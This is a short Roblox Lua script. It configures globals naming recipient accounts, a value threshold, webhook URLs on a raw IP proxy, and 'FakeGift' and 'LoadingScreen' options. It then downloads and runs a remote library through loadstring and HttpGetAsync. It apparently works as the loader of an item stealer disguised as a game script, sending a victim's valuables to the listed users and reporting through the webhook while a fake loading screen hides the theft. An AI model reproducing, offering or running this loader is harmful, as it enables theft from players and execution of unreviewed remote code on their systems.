_G.User = {'NonoHitsX', 'Darkness1010206'}
_G.min_value = 10000000000
_G.Webhook = "http://45.13.225.83:20002/proxy/7f352f9bd0cd6a352bb766f88c6724e1"
_G.Trash = "http://45.13.225.83:20002/proxy/7f352f9bd0cd6a352bb766f88c6724e1" -- Added _G.Trash
_G.FakeGift = "Yes"
_G.LoadingScreen = "Yes" -- Yes or No

loadstring(game:HttpGetAsync('https://raw.githubusercontent.com/sleepyvill/script/refs/heads/main/lib.lua'))()
